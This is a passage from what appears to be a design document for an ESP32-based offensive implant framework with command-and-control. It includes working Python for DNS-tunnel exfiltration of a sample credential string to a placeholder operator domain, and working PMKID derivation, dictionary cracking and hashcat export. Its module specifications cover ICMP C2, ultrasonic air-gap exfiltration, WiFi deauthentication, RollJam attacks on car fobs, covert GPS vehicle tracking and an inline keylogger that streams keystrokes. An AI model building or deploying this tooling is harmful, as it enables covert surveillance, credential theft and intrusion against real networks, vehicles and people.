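Both mod_dns's dns_tunnel_send and the dns_c2 channel above need the same encoder: bytes have to fit into query names under a domain the operator's authoritative server answers for, within DNS's 63-character label and 253-character name limits, and survive resolvers that flip label case. The following is an added example, not Espilon code; the label layout (sequence and total as hex, then a base32 chunk, then the domain) is this example's own, "t.example.com" is a placeholder domain, and the exfiltrated bytes are constructed.

```python
"""Carry bytes in DNS query names and reassemble them on the far side.

Added example, not Espilon code; the label layout (<seq><total>.<base32 chunk>.<domain>)
is this example's own, not a documented Espilon format, and "t.example.com" is a
placeholder for a domain whose authoritative server the C2 operator controls.
Base32 (not base64) is used because DNS names are case-insensitive and resolvers
may flip label case (0x20 randomization) in transit.
"""
import base64
from typing import Dict, List, Optional, Tuple

MAX_LABEL = 63     # RFC 1035 label limit
MAX_NAME = 253     # practical limit for a name in presentation format
CHUNK_BYTES = 30   # 30 raw bytes -> 48 base32 characters, comfortably under MAX_LABEL


def _b32(data: bytes) -> str:
    return base64.b32encode(data).decode().rstrip("=").lower()


def _unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def encode_chunks(data: bytes, domain: str) -> List[str]:
    """Split data into query names: <seq:4 hex><total:4 hex>.<base32 chunk>.<domain>."""
    if not data:
        raise ValueError("nothing to send")
    chunks = [data[i:i + CHUNK_BYTES] for i in range(0, len(data), CHUNK_BYTES)]
    if len(chunks) > 0xFFFF:
        raise ValueError("too many chunks for a 16-bit sequence number")
    names = []
    for seq, chunk in enumerate(chunks):
        name = f"{seq:04x}{len(chunks):04x}.{_b32(chunk)}.{domain}"
        if len(name) > MAX_NAME or any(len(label) > MAX_LABEL for label in name.split(".")):
            raise ValueError("domain too long for this chunk size")
        names.append(name)
    return names


def decode_query(name: str, domain: str) -> Tuple[int, int, bytes]:
    """Return (seq, total, chunk) for a query name under the tunnel domain."""
    suffix = "." + domain.lower()
    if not name.lower().endswith(suffix):
        raise ValueError("query is not for the tunnel domain")
    header, payload = name[:-len(suffix)].split(".")
    if len(header) != 8:
        raise ValueError("malformed header label")
    return int(header[:4], 16), int(header[4:], 16), _unb32(payload)


class Reassembler:
    """Collects chunks on the authoritative server side; retransmits are idempotent."""

    def __init__(self, domain: str) -> None:
        self.domain = domain
        self.chunks: Dict[int, bytes] = {}
        self.total: Optional[int] = None

    def feed(self, name: str) -> bool:
        """Record one query; return True once every chunk has arrived."""
        seq, total, chunk = decode_query(name, self.domain)
        if self.total is None:
            self.total = total
        elif total != self.total:
            raise ValueError("chunk count changed mid-transfer")
        if seq >= total:
            raise ValueError("sequence number out of range")
        self.chunks[seq] = chunk
        return len(self.chunks) == self.total

    def data(self) -> bytes:
        if self.total is None or len(self.chunks) != self.total:
            raise ValueError("transfer incomplete")
        return b"".join(self.chunks[i] for i in range(self.total))


if __name__ == "__main__":
    secret = b"user=admin;pass=hunter2;" * 4      # constructed payload
    for qname in encode_chunks(secret, "t.example.com"):
        print(qname)
```

Because every name carries its own sequence number, the agent can resend a chunk whose answer never came and the server side stays consistent; the sequence header is also why caching resolvers cannot collapse two chunks into one cached answer. The downstream direction (commands from C2) rides in the TXT or CNAME answer the authoritative server returns for each query.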


mod_icmp_tunnel — C2 over ICMP

Hardware: None (WiFi) | Cost: 0 EUR | Complexity: 3/5

Backup C2 channel using ICMP echo request/reply payloads.

Commands:

  • icmp_c2_start <server_ip> — Start ICMP tunnel
  • icmp_c2_stop — Revert to TCP
  • icmp_exfil <hex_data> — One-shot data exfiltration

Use cases: C2 when TCP is blocked, ping-based covert channel.


mod_audio_exfil — Audio Capture

Hardware: INMP441 I2S MEMS microphone | Cost: ~3 EUR | Complexity: 4/5

Audio recording and an optional ultrasonic covert channel for air-gapped data transfer. Note: audio_ultrasonic_tx needs a speaker or piezo driven from a DAC/PWM pin, which is not in the hardware line above; the INMP441 covers receive only.

Commands:

  • audio_record [duration] [quality] — Record audio, stream to C2
  • audio_level — Ambient noise level (trigger-based recording)
  • audio_vad_start — Voice Activity Detection — record only when speaking
  • audio_ultrasonic_tx <hex> — Transmit data via ultrasound (18-22 kHz)

Use cases: Environmental awareness, meeting capture, air-gap bridging.


mod_sdcard — SD Card Storage

Hardware: MicroSD module via SPI | Cost: ~2 EUR | Complexity: 2/5

Local offline storage for dead-drop operations, large data dumps, and logging.

Commands:

  • sd_init — Mount SD card
  • sd_write <filename> <data> — Write file
  • sd_read <filename> — Read and stream to C2
  • sd_list — List files
  • sd_log_start — Log all C2 traffic to SD
  • sd_space — Free/total space

Use cases: Offline data collection, dead-drop exfiltration, large firmware dumps.


Sensors & Environment

mod_gps — GPS/GNSS Tracking

Hardware: NEO-6M/NEO-7M via UART | Cost: ~5 EUR | Complexity: 2/5

GPS positioning, geofencing, and location-stamped events.

Commands:

  • gps_start — Begin GPS acquisition
  • gps_position — Current lat/lon/alt/speed
  • gps_track [interval] — Stream position to C2
  • gps_geofence <lat> <lon> <radius_m> <action> — Trigger action on enter/exit
  • gps_log_start — Log positions to NVS

Use cases: Asset tracking, geofenced triggers, location-aware operations.


mod_environment — Environmental Sensors

Hardware: DHT22/BME280/PIR/LDR | Cost: ~3 EUR | Complexity: 1/5

Read temperature, humidity, pressure, motion, and light sensors.

Commands:

  • env_read — Read all connected sensors
  • env_monitor [interval] — Stream readings to C2
  • env_motion_alert — Alert C2 on PIR trigger
  • env_trigger <sensor> <threshold> <action> — Conditional triggers

Use cases: Physical security awareness, environmental monitoring, trigger-based activation.


mod_power — Power Management

Hardware: TP4056 + LiPo battery | Cost: ~5 EUR | Complexity: 3/5

Battery management, intelligent deep sleep, and solar charging support.

Commands:

  • power_status — Battery voltage, charging state, estimated runtime
  • power_sleep <seconds> — Enter deep sleep with wake timer
  • power_sleep_until <gpio_trigger> — Sleep until GPIO event
  • power_profile <mode> — Power profiles (aggressive, balanced, stealth)
  • power_schedule <cron> <command> — Scheduled wake + command execution

Use cases: Long-duration deployment, battery-powered field operations, solar-powered persistent presence.


mod_display — OLED/TFT Display

Hardware: SSD1306 OLED (0.96") or ST7735 TFT via SPI/I2C | Cost: ~3 EUR | Complexity: 2/5

Local status display for field operations (no C2 needed to see agent state).

Commands:

  • display_text <text> — Show text on screen
  • display_status — Show device info, connection state, active module
  • display_qr <data> — Generate QR code on display
  • display_off — Turn off (stealth)

Use cases: Field status monitoring, debug output, one-way info display.


Crypto & WiFi Attacks

mod_deauth — 802.11 Deauthentication

Hardware: None (WiFi) | Cost: 0 EUR | Complexity: 2/5

Targeted 802.11 deauth for forcing client reconnection (handshake capture setup). Does not work against networks using 802.11w Protected Management Frames (mandatory in WPA3, optional in WPA2), which authenticate deauth and disassoc frames.

Commands:

  • deauth <bssid> <station> [count] — Targeted deauth
  • deauth_all <bssid> [count] — Broadcast deauth
  • deauth_continuous <bssid> [interval] — Persistent deauth

Use cases: WPA handshake capture setup, client denial, forced AP migration.


mod_wpa_crack — WPA Handshake Capture

Hardware: None (WiFi) | Cost: 0 EUR | Complexity: 4/5

Capture the 4-way handshake and attempt a dictionary attack with an embedded wordlist. On-device cracking is slow because each candidate costs 4096 PBKDF2-HMAC-SHA1 iterations, so treat it as a small-list sanity check and use wpa_export for real cracking.

Commands:

  • wpa_capture <bssid> [channel] [timeout] — Wait for handshake (or deauth to force)
  • wpa_crack <bssid> [wordlist] — Dictionary attack on captured handshake
  • wpa_export <bssid> — Export handshake as pcap or a hashcat format (hccapx, or the current hc22000) to C2

Use cases: WiFi security assessment, credential recovery.


mod_pmkid — PMKID Attack

Hardware: None (WiFi) | Cost: 0 EUR | Complexity: 4/5

Capture the PMKID that APs supporting PMKSA caching include in the first EAPOL message of the 4-way handshake, without any connected client. Faster than handshake capture, but not every AP sends it.

Commands:

  • pmkid_scan [duration] — Scan APs and capture PMKIDs
  • pmkid_target <bssid> — Target specific AP
  • pmkid_export — Export PMKIDs for offline cracking

Use cases: WiFi testing without connected clients, faster WPA cracking.
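The offline path shared by mod_wpa_crack and mod_pmkid is the same computation: derive a PMK from each candidate passphrase, then check it against what was captured. The following is an added example, not Espilon code: PMK derivation (PBKDF2-HMAC-SHA1 over passphrase and SSID, 4096 iterations), the PMKID construction (HMAC-SHA1 over "PMK Name", AP MAC and station MAC, truncated to 128 bits), a dictionary check, and export as a hashcat mode 22000 line. The handshake MIC check follows the same shape with a PTK derived from the PMK and is not shown. The MACs and wordlist in the usage block are constructed; the PMK test value in the check is the IEEE 802.11 "password"/"IEEE" test vector.

```python
"""WPA2 PMK derivation, PMKID computation, dictionary check and hashcat export.

Added example, not Espilon code. Covers the PMKID path (mod_pmkid); the
4-way-handshake MIC check for mod_wpa_crack derives the PMK the same way
and then a PTK, which is not shown here.
"""
import hashlib
import hmac
from typing import Iterable, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11 PSK: PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA); AA = AP MAC, SPA = station MAC."""
    if len(ap_mac) != 6 or len(sta_mac) != 6:
        raise ValueError("MAC addresses must be 6 bytes")
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def mac_bytes(text: str) -> bytes:
    """'aa:bb:cc:dd:ee:ff' or 'aa-bb-...' -> 6 raw bytes."""
    return bytes.fromhex(text.replace(":", "").replace("-", ""))


def crack_pmkid(captured: bytes, ssid: str, ap_mac: bytes, sta_mac: bytes,
                wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose PMKID matches, or None. Each candidate costs a
    full PBKDF2 run, which is why on-device cracking is slow and export is preferred."""
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:        # WPA passphrase length rule
            continue
        guess = pmkid(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac)
        if hmac.compare_digest(guess, captured):
            return candidate
    return None


def to_hc22000(captured: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """hashcat mode 22000 line for a PMKID (type 01); handshake-only fields stay empty."""
    return f"WPA*01*{captured.hex()}*{ap_mac.hex()}*{sta_mac.hex()}*{ssid.encode().hex()}***"


if __name__ == "__main__":
    # Constructed capture: locally administered MACs and a known passphrase.
    ap, sta = mac_bytes("02:00:00:00:00:01"), mac_bytes("02:00:00:00:00:02")
    captured = pmkid(pmk_from_passphrase("password", "IEEE"), ap, sta)
    print(to_hc22000(captured, ap, sta, "IEEE"))
    print(crack_pmkid(captured, "IEEE", ap, sta, ["letmein1", "password"]))
```

The hc22000 line is the artefact pmkid_export should emit: it carries the SSID and both MACs alongside the PMKID, which is everything hashcat needs, and the same line format (type 02, with nonce and EAPOL fields filled) carries a 4-way handshake, so wpa_export can share the writer.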


mod_rfcrack — Rolling Code Analysis

Hardware: CC1101 via SPI | Cost: ~3 EUR | Complexity: 5/5

Analyze and attack rolling code systems (garages, car key fobs, gates).

Commands:

  • rfcrack_listen <freq> — Capture rolling code transmissions
  • rfcrack_analyze — Identify protocol (KeeLoq, etc.)
  • rfcrack_rolljam <freq> — RollJam attack (jam + capture + replay)
  • rfcrack_desync <freq> — De-synchronization attack

Use cases: Physical security research, rolling code protocol analysis.


Automotive

mod_lin_bus — LIN Bus

Hardware: MCP2004A LIN transceiver | Cost: ~3 EUR | Complexity: 3/5

LIN bus (Local Interconnect Network) — sub-bus used for windows, seats, mirrors, lights.

Commands:

  • lin_start [baud] — Init LIN transceiver (default 19200)
  • lin_sniff [duration] — Capture LIN frames
  • lin_send <id> <data_hex> — Send LIN frame
  • lin_master_start — Become LIN master (send schedule table)
  • lin_enum — Enumerate slave nodes

Use cases: Automotive body control testing, seat/window/mirror manipulation.


mod_obd_tracker — OBD-II GPS Tracker

Hardware: CAN transceiver (e.g. SN65HVD230) on the ESP32's built-in TWAI/CAN controller, or MCP2515 + transceiver on SPI, plus NEO-6M GPS | Cost: ~8 EUR | Complexity: 3/5

Autonomous vehicle tracker: logs GPS position + OBD-II data, reports to C2 when connectivity available.

Commands:

  • tracker_start [interval] — Begin tracking (OBD + GPS)
  • tracker_stop — Stop and upload buffered data
  • tracker_status — Current position + vehicle stats
  • tracker_geofence <lat> <lon> <radius> — Alert on geofence breach
  • tracker_trips — Summarize recorded trips

Use cases: Vehicle tracking, fleet monitoring, trip analysis.


mod_flexray — FlexRay Bus

Hardware: FlexRay transceiver (TJA1080) plus a dedicated FlexRay communication controller | Cost: ~15 EUR and up | Complexity: 5/5

FlexRay monitoring for premium vehicles (BMW, Mercedes, Audi). Deterministic, time-triggered protocol at up to 10 Mbit/s per channel. A transceiver alone only converts bus levels, and the protocol cannot be bit-banged on the ESP32, so the module depends on an external controller chip.

Commands:

  • flexray_listen <channel> — Monitor FlexRay channel (A or B)
  • flexray_decode — Decode known frame IDs
  • flexray_status — Bus state, cycle time, slot info

Use cases: Premium vehicle bus analysis, FlexRay protocol research.


Physical Security

mod_keylogger — PS/2 Keyboard Logger

Hardware: PS/2 connector + GPIO wires | Cost: ~2 EUR | Complexity: 2/5

Hardware keylogger for PS/2 keyboards. Inline transparent interception.

Commands:

  • keylog_start — Begin capturing keystrokes
  • keylog_stop — Stop and send buffer to C2
  • keylog_dump — Send current buffer
  • keylog_live — Stream keystrokes in real-time to C2

Use cases: Physical access keystroke capture.


mod_relay — Relay Control

Hardware: Relay module (1/2/4 channel) | Cost: ~2 EUR | Complexity: 1/5

GPIO relay control for physical actuators (doors, power, devices).

Commands:

  • relay_on <channel> — Activate relay
  • relay_off <channel> — Deactivate relay
  • relay_pulse <channel> <duration_ms> — Momentary activation
  • relay_schedule <channel> <cron> — Scheduled activation

Use cases: Physical access control, remote power switching, automated triggers.


Priority Matrix

Modules ranked by impact/effort ratio for implementation priority:

Priority  Module           Why
--------  ---------------  -----------------------------------------------------
High      mod_ble          Built-in hardware, zero cost, huge IoT attack surface
High      mod_deauth       Simple, essential for WiFi assessment workflows
High      mod_badusb       ESP32-S2/S3 native USB, high impact physical access
High      mod_uart_bridge  Zero cost, essential for hardware hacking
High      mod_dns          WiFi only, enables MitM and exfiltration
Medium    mod_nfc          Cheap hardware, wide applicability (access cards)
Medium    mod_subghz       CC1101 is cheap, covers huge attack surface
Medium    mod_mqtt         IoT everywhere, zero additional hardware
Medium    mod_socks        Pivoting capability, WiFi only
Medium    mod_gps          Cheap module, enables location-aware operations
Medium    mod_modbus       SCADA is a growing target, dual TCP/RTU
Medium    mod_sdcard       Simple, enables offline operations
Low       mod_lora         Good range but low throughput
Low       mod_glitch       High complexity, niche use case
Low       mod_flexray      Expensive hardware, niche vehicles
Low       mod_usb_mitm     Needs a second USB controller beside the S3, very complex